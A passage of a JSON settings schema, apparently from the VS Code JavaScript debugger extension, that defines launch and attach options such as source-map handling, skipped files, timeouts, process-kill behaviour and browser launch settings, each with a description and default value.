source.","default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"items":{"type":"string"},"tags":["setup"]},"pauseForSourceMap":{"type":"boolean","markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","default":false},"showAsyncStacks":{"description":"Show the async calls that led to the current call stack.","default":true,"oneOf":[{"type":"boolean"},{"type":"object","required":["onAttach"],"properties":{"onAttach":{"type":"number","default":32}}},{"type":"object","required":["onceBreakpointResolved"],"properties":{"onceBreakpointResolved":{"type":"number","default":32}}}]},"skipFiles":{"type":"array","description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","default":["${/**"]},"smartStep":{"type":"boolean","description":"Automatically step through generated code that cannot be mapped back to the original source.","default":true},"sourceMaps":{"type":"boolean","description":"Use JavaScript source maps (if they exist).","default":true},"sourceMapRenames":{"type":"boolean","default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers."},"sourceMapPathOverrides":{"type":"object","description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","default":{"webpack://?:*/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","meteor://💻app/*":"${workspaceFolder}/*"}},"timeout":{"type":"number","description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","default":10000},"timeouts":{"type":"object","description":"Timeouts for several debugger operations.","default":{},"properties":{"sourceMapMinPause":{"type":"number","description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","default":1000},"sourceMapCumulativePause":{"type":"number","description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","default":1000},"hoverEvaluation":{"type":"number","description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","default":500}},"additionalProperties":false,"markdownDescription":"Timeouts for several debugger operations."},"trace":{"description":"Configures what diagnostic output is produced.","default":true,"oneOf":[{"type":"boolean","description":"Trace may be set to 'true' to write diagnostic logs to the disk."},{"type":"object","additionalProperties":false,"properties":{"stdio":{"type":"boolean","description":"Whether to return trace data from the launched application or browser."},"logFile":{"type":["string","null"],"description":"Configures where on disk logs are written."}}}]},"outputCapture":{"enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`.","default":"console"},"enableContentValidation":{"default":true,"type":"boolean","description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example."},"customDescriptionGenerator":{"type":"string","description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n "},"customPropertiesGenerator":{"type":"string","deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181"},"cascadeTerminateToConfigurations":{"type":"array","items":{"type":"string","uniqueItems":true},"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped."},"enableDWARF":{"type":"boolean","default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function."},"disableNetworkCache":{"type":"boolean","description":"Controls whether to skip the network cache for each request","default":true},"pathMapping":{"type":"object","description":"A mapping of URLs/paths to local folders, to resolve scripts in the Browser to scripts on disk","default":{}},"webRoot":{"type":"string","description":"This specifies the workspace absolute path to the webserver root. Used to resolve paths like `/app.js` to files on disk. Shorthand for a pathMapping for \"/\"","default":"${workspaceFolder}","tags":["setup"]},"urlFilter":{"type":"string","description":"Will search for a page with this url and attach to it, if found. Can have * wildcards.","default":""},"url":{"type":"string","description":"Will search for a tab with this exact url and attach to it, if found","default":"http://localhost:8080","tags":["setup"]},"inspectUri":{"type":["string","null"],"description":"Format to use to rewrite the inspectUri: It's a template string that interpolates keys in `{curlyBraces}`. Available keys are:\n - `url.*` is the parsed address of the running application. For instance, `{url.port}`, `{url.hostname}`\n - `port` is the debug port that Chrome is listening on.\n - `browserInspectUri` is the inspector URI on the launched browser\n - `browserInspectUriPath` is the path part of the inspector URI on the launched browser (e.g.: \"/devtools/browser/e9ec0098-306e-472a-8133-5e42488929c2\").\n - `wsProtocol` is the hinted websocket protocol. This is set to `wss` if the original URL is `https`, or `ws` otherwise.\n","default":null},"vueComponentPaths":{"type":"array","description":"A list of file glob patterns to find `*.vue` components. By default, searches the entire workspace. This needs to be specified due to extra lookups that Vue's sourcemaps require in Vue CLI 4. You can disable this special handling by setting this to an empty array.","default":["${workspaceFolder}/**/*.vue"]},"server":{"oneOf":[{"type":"object","description":"Configures a web server to start up. Takes the same configuration as the 'node' launch task.","additionalProperties":false,"default":{"program":"node my-server.js"},"properties":{"resolveSourceMapLocations":{"type":["array","null"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","default":["${workspaceFolder}/**","!**/node_modules/**"],"items":{"type":"string"}},"outFiles":{"type":["array"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"items":{"type":"string"},"tags":["setup"]},"pauseForSourceMap":{"type":"boolean","markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","default":false},"showAsyncStacks":{"description":"Show the async calls that led to the current call stack.","default":true,"oneOf":[{"type":"boolean"},{"type":"object","required":["onAttach"],"properties":{"onAttach":{"type":"number","default":32}}},{"type":"object","required":["onceBreakpointResolved"],"properties":{"onceBreakpointResolved":{"type":"number","default":32}}}]},"skipFiles":{"type":"array","description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","default":["${/**"]},"smartStep":{"type":"boolean","description":"Automatically step through generated code that cannot be mapped back to the original source.","default":true},"sourceMaps":{"type":"boolean","description":"Use JavaScript source maps (if they exist).","default":true},"sourceMapRenames":{"type":"boolean","default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers."},"sourceMapPathOverrides":{"type":"object","description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","default":{"webpack://?:*/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","meteor://💻app/*":"${workspaceFolder}/*"}},"timeout":{"type":"number","description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","default":10000},"timeouts":{"type":"object","description":"Timeouts for several debugger operations.","default":{},"properties":{"sourceMapMinPause":{"type":"number","description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","default":1000},"sourceMapCumulativePause":{"type":"number","description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","default":1000},"hoverEvaluation":{"type":"number","description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","default":500}},"additionalProperties":false,"markdownDescription":"Timeouts for several debugger operations."},"trace":{"description":"Configures what diagnostic output is produced.","default":true,"oneOf":[{"type":"boolean","description":"Trace may be set to 'true' to write diagnostic logs to the disk."},{"type":"object","additionalProperties":false,"properties":{"stdio":{"type":"boolean","description":"Whether to return trace data from the launched application or browser."},"logFile":{"type":["string","null"],"description":"Configures where on disk logs are written."}}}]},"outputCapture":{"enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`.","default":"console"},"enableContentValidation":{"default":true,"type":"boolean","description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example."},"customDescriptionGenerator":{"type":"string","description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n "},"customPropertiesGenerator":{"type":"string","deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181"},"cascadeTerminateToConfigurations":{"type":"array","items":{"type":"string","uniqueItems":true},"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped."},"enableDWARF":{"type":"boolean","default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function."},"cwd":{"type":"string","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","default":"${workspaceFolder}","tags":["setup"]},"localRoot":{"type":["string","null"],"description":"Path to the local directory containing the program.","default":null},"remoteRoot":{"type":["string","null"],"description":"Absolute path to the remote directory containing the program.","default":null},"autoAttachChildProcesses":{"type":"boolean","description":"Attach debugger to new child processes automatically.","default":true},"env":{"type":"object","additionalProperties":{"type":["string","null"]},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","default":{},"tags":["setup"]},"envFile":{"type":"string","description":"Absolute path to a file containing environment variable definitions.","default":"${workspaceFolder}/.env"},"runtimeSourcemapPausePatterns":{"type":"array","items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","default":[]},"nodeVersionHint":{"type":"number","minimum":8,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","default":12},"program":{"type":"string","description":"Absolute path to the program. Generated value is guessed by looking at package.json and opened files. Edit this attribute.","default":"","tags":["setup"]},"stopOnEntry":{"type":["boolean","string"],"description":"Automatically stop program after launch.","default":true},"console":{"type":"string","enum":["internalConsole","integratedTerminal","externalTerminal"],"enumDescriptions":["VS Code Debug Console (which doesn't support to read input from a program)","VS Code's integrated terminal","External terminal that can be configured via user settings"],"description":"Where to launch the debug target.","default":"internalConsole"},"args":{"type":["array","string"],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"default":[],"tags":["setup"]},"restart":{"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","default":true,"oneOf":[{"type":"boolean"},{"type":"object","properties":{"delay":{"type":"number","minimum":0,"default":1000},"maxAttempts":{"type":"number","minimum":0,"default":10}}}]},"runtimeExecutable":{"type":["string","null"],"markdownDescription":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If omitted `node` is assumed.","default":"node"},"runtimeVersion":{"type":"string","markdownDescription":"Version of `node` runtime to use. Requires `nvm`.","default":"default"},"runtimeArgs":{"type":"array","description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"default":[],"tags":["setup"]},"profileStartup":{"type":"boolean","description":"If true, will start profiling as soon as the process launches","default":true},"attachSimplePort":{"oneOf":[{"type":"integer"},{"type":"string","pattern":"^\\${.*}$"}],"description":"If set, attaches to the process via the given port. This is generally no longer necessary for Node.js programs and loses the ability to debug child processes, but can be useful in more esoteric scenarios such as with Deno and Docker launches. If set to 0, a random port will be chosen and --inspect-brk added to the launch arguments automatically.","default":9229},"killBehavior":{"type":"string","enum":["forceful","polite","none"],"default":"forceful","markdownDescription":"Configures how debug processes are killed when stopping the session. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen."},"experimentalNetworking":{"type":"string","default":"auto","description":"Enable experimental inspection in Node.js. When set to `auto` this is enabled for versions of Node.js that support it. It can be set to `on` or `off` to enable or disable it explicitly.","enum":["auto","on","off"]}}},{"type":"object","description":"JavaScript Debug Terminal","additionalProperties":false,"default":{"program":"npm start"},"properties":{"resolveSourceMapLocations":{"type":["array","null"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","default":["${workspaceFolder}/**","!**/node_modules/**"],"items":{"type":"string"}},"outFiles":{"type":["array"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"items":{"type":"string"},"tags":["setup"]},"pauseForSourceMap":{"type":"boolean","markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","default":false},"showAsyncStacks":{"description":"Show the async calls that led to the current call stack.","default":true,"oneOf":[{"type":"boolean"},{"type":"object","required":["onAttach"],"properties":{"onAttach":{"type":"number","default":32}}},{"type":"object","required":["onceBreakpointResolved"],"properties":{"onceBreakpointResolved":{"type":"number","default":32}}}]},"skipFiles":{"type":"array","description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","default":["${/**"]},"smartStep":{"type":"boolean","description":"Automatically step through generated code that cannot be mapped back to the original source.","default":true},"sourceMaps":{"type":"boolean","description":"Use JavaScript source maps (if they exist).","default":true},"sourceMapRenames":{"type":"boolean","default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers."},"sourceMapPathOverrides":{"type":"object","description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","default":{"webpack://?:*/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","meteor://💻app/*":"${workspaceFolder}/*"}},"timeout":{"type":"number","description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","default":10000},"timeouts":{"type":"object","description":"Timeouts for several debugger operations.","default":{},"properties":{"sourceMapMinPause":{"type":"number","description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","default":1000},"sourceMapCumulativePause":{"type":"number","description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","default":1000},"hoverEvaluation":{"type":"number","description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","default":500}},"additionalProperties":false,"markdownDescription":"Timeouts for several debugger operations."},"trace":{"description":"Configures what diagnostic output is produced.","default":true,"oneOf":[{"type":"boolean","description":"Trace may be set to 'true' to write diagnostic logs to the disk."},{"type":"object","additionalProperties":false,"properties":{"stdio":{"type":"boolean","description":"Whether to return trace data from the launched application or browser."},"logFile":{"type":["string","null"],"description":"Configures where on disk logs are written."}}}]},"outputCapture":{"enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`.","default":"console"},"enableContentValidation":{"default":true,"type":"boolean","description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example."},"customDescriptionGenerator":{"type":"string","description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n "},"customPropertiesGenerator":{"type":"string","deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181"},"cascadeTerminateToConfigurations":{"type":"array","items":{"type":"string","uniqueItems":true},"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped."},"enableDWARF":{"type":"boolean","default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function."},"cwd":{"type":"string","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","default":"${workspaceFolder}","docDefault":"localRoot || ${workspaceFolder}","tags":["setup"]},"localRoot":{"type":["string","null"],"description":"Path to the local directory containing the program.","default":null},"remoteRoot":{"type":["string","null"],"description":"Absolute path to the remote directory containing the program.","default":null},"autoAttachChildProcesses":{"type":"boolean","description":"Attach debugger to new child processes automatically.","default":true},"env":{"type":"object","additionalProperties":{"type":["string","null"]},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","default":{},"tags":["setup"]},"envFile":{"type":"string","description":"Absolute path to a file containing environment variable definitions.","default":"${workspaceFolder}/.env"},"runtimeSourcemapPausePatterns":{"type":"array","items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","default":[]},"nodeVersionHint":{"type":"number","minimum":8,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","default":12},"command":{"type":["string","null"],"description":"Command to run in the launched terminal. If not provided, the terminal will open without launching a program.","default":"npm start","tags":["setup"]}}}]},"perScriptSourcemaps":{"type":"string","default":"auto","enum":["yes","no","auto"],"description":"Whether scripts are loaded individually with unique sourcemaps containing the basename of the source file. This can be set to optimize sourcemap handling when dealing with lots of small scripts. If set to \"auto\", we'll detect known cases where this is appropriate."},"port":{"type":"number","description":"Port for the browser to listen on. Defaults to \"0\", which will cause the browser to be debugged via pipes, which is generally more secure and should be chosen unless you need to attach to the browser from another tool.","default":0},"file":{"type":"string","description":"A local html file to open in the browser","default":"${workspaceFolder}/index.html","tags":["setup"]},"userDataDir":{"type":["string","boolean"],"description":"By default, the browser is launched with a separate user profile in a temp folder. Use this option to override it. Set to false to launch with your default user profile. A new browser can't be launched if an instance is already running from `userDataDir`.","default":true},"includeDefaultArgs":{"type":"boolean","description":"Whether default browser launch arguments (to disable features that may make debugging harder) will be included in the launch.","default":true},"includeLaunchArgs":{"type":"boolean","description":"Advanced: whether any default launch/debugging arguments are set on the browser. The debugger will assume the browser will use pipe debugging such as that which is provided with `--remote-debugging-pipe`.","default":true},"runtimeExecutable":{"type":["string","null"],"description":"Either 'canary', 'stable', 'custom' or path to the browser executable. Custom means a custom wrapper, custom build or CHROME_PATH environment variable.","default":"stable"},"runtimeArgs":{"type":"array","description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"default":[]},"env":{"type":"object","description":"Optional dictionary of environment key/value pairs for the browser.","default":{}},"cwd":{"type":"string","description":"Optional working directory for the runtime executable.","default":null},"profileStartup":{"type":"boolean","description":"If true, will start profiling soon as the process launches","default":true},"cleanUp":{"type":"string","enum":["wholeBrowser","onlyTab"],"description":"What clean-up to do after the debugging session finishes. Close only the tab being debug, vs. close the whole browser.","default":"wholeBrowser"},"killBehavior":{"type":"string","enum":["forceful","polite","none"],"default":"forceful","markdownDescription":"Configures how browser processes are killed when stopping the session with `cleanUp: wholeBrowser`. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen."},"browserLaunchLocation":{"description":"Forces the browser to be launched in one location. In a remote workspace (through ssh or WSL, for example) this can be used to open the browser on the remote machine rather than locally.","default":null,"oneOf":[{"type":"null"},{"type":"string","enum":["ui","workspace"]}]},"enabled":{"type":"string","enum":["on","off","always"]}}}]},"debug.javascript.pickAndAttachOptions":{"type":"object","default":{},"markdownDescription":"Default options used when debugging a process through the `Debug: Attach to Node.js Process` command","properties":{"resolveSourceMapLocations":{"type":["array","null"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","default":["${workspaceFolder}/**","!**/node_modules/**"],"items":{"type":"string"}},"outFiles":{"type":["array"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"items":{"type":"string"},"tags":["setup"]},"pauseForSourceMap":{"type":"boolean","markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","default":false},"showAsyncStacks":{"description":"Show the async calls that led to the current call stack.","default":true,"oneOf":[{"type":"boolean"},{"type":"object","required":["onAttach"],"properties":{"onAttach":{"type":"number","default":32}}},{"type":"object","required":["onceBreakpointResolved"],"properties":{"onceBreakpointResolved":{"type":"number","default":32}}}]},"skipFiles":{"type":"array","description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","default":["${/**"]},"smartStep":{"type":"boolean","description":"Automatically step through generated code that cannot be mapped back to the original source.","default":true},"sourceMaps":{"type":"boolean","description":"Use JavaScript source maps (if they exist).","default":true},"sourceMapRenames":{"type":"boolean","default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers."},"sourceMapPathOverrides":{"type":"object","description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","default":{"webpack://?:*/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","meteor://💻app/*":"${workspaceFolder}/*"}},"timeout":{"type":"number","description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","default":10000},"timeouts":{"type":"object","description":"Timeouts for several debugger operations.","default":{},"properties":{"sourceMapMinPause":{"type":"number","description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","default":1000},"sourceMapCumulativePause":{"type":"number","description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","default":1000},"hoverEvaluation":{"type":"number","description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","default":500}},"additionalProperties":false,"markdownDescription":"Timeouts for several debugger operations."},"trace":{"description":"Configures what diagnostic output is produced.","default":true,"oneOf":[{"type":"boolean","description":"Trace may be set to 'true' to write diagnostic logs to the disk."},{"type":"object","additionalProperties":false,"properties":{"stdio":{"type":"boolean","description":"Whether to return trace data from the launched application or browser."},"logFile":{"type":["string","null"],"description":"Configures where on disk logs are written."}}}]},"outputCapture":{"enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`.","default":"console"},"enableContentValidation":{"default":true,"type":"boolean","description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example."},"customDescriptionGenerator":{"type":"string","description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n "},"customPropertiesGenerator":{"type":"string","deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181"},"cascadeTerminateToConfigurations":{"type":"array","items":{"type":"string","uniqueItems":true},"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped."},"enableDWARF":{"type":"boolean","default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function."},"cwd":{"type":"string","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","default":"${workspaceFolder}","docDefault":"localRoot || ${workspaceFolder}","tags":["setup"]},"localRoot":{"type":["string","null"],"description":"Path to the local directory containing the program.","default":null},"remoteRoot":{"type":["string","null"],"description":"Absolute path to the remote directory containing the program.","default":null},"autoAttachChildProcesses":{"type":"boolean","description":"Attach debugger to new child processes automatically.","default":true},"env":{"type":"object","additionalProperties":{"type":["string","null"]},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","default":{},"tags":["setup"]},"envFile":{"type":"string","description":"Absolute path to a file containing environment variable definitions.","default":"${workspaceFolder}/.env"},"runtimeSourcemapPausePatterns":{"type":"array","items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","default":[]},"nodeVersionHint":{"type":"number","minimum":8,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","default":12},"address":{"type":"string","description":"TCP/IP address of process to be debugged. Default is 'localhost'.","default":"localhost"},"port":{"description":"Debug port to attach to. Default is 9229.","default":9229,"oneOf":[{"type":"integer"},{"type":"string","pattern":"^\\${.*}$"}],"tags":["setup"]},"websocketAddress":{"type":"string","description":"Exact websocket address to attach to. If unspecified, it will be discovered from the address and port."},"remoteHostHeader":{"type":"string","description":"Explicit Host header to use when connecting to the websocket of inspector. If unspecified, the host header will be set to 'localhost'. This is useful when the inspector is running behind a proxy that only accept particular Host header."},"restart":{"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","default":true,"oneOf":[{"type":"boolean"},{"type":"object","properties":{"delay":{"type":"number","minimum":0,"default":1000},"maxAttempts":{"type":"number","minimum":0,"default":10}}}]},"processId":{"type":"string","description":"ID of process to attach to.","default":"${command:PickProcess}"},"attachExistingChildren":{"type":"boolean","description":"Whether to attempt to attach to already-spawned child processes.","default":false},"continueOnAttach":{"type":"boolean","markdownDescription":"If true, we'll automatically resume programs launched and waiting on `--inspect-brk`","default":true}}},"debug.javascript.autoAttachFilter":{"type":"string","default":"disabled","enum":["always","smart","onlyWithFlag","disabled"],"enumDescriptions":["Auto attach to every Node.js process launched in the terminal.","Auto attach when running scripts that aren't in a node_modules folder.","Only auto attach when the `--inspect` is given.","Auto attach is disabled and not shown in status bar."],"markdownDescription":"Configures which processes to automatically attach and debug when `#debug.node.autoAttach#` is on. A Node process launched with the `--inspect` flag will always be attached to, regardless of this setting."},"debug.javascript.autoAttachSmartPattern":{"type":"array","items":{"type":"string"},"default":["${workspaceFolder}/**","!**/node_modules/**","**/$KNOWN_TOOLS$/**"],"markdownDescription":"Configures glob patterns for determining when to attach in \"smart\" `#debug.javascript.autoAttachFilter#` mode. `$KNOWN_TOOLS$` is replaced with a list of names of common test and code runners. [Read more on the VS Code docs](https://code.visualstudio.com/docs/nodejs/nodejs-debugging#_auto-attach-smart-patterns)."},"debug.javascript.breakOnConditionalError":{"type":"boolean","default":false,"markdownDescription":"Whether to stop when conditional breakpoints throw an error."},"debug.javascript.unmapMissingSources":{"type":"boolean","default":false,"description":"Configures whether sourcemapped file where the original file can't be read will automatically be unmapped. If this is false (default), a prompt is shown."},"debug.javascript.defaultRuntimeExecutable":{"type":"object","default":{"pwa-node":"node"},"markdownDescription":"The default 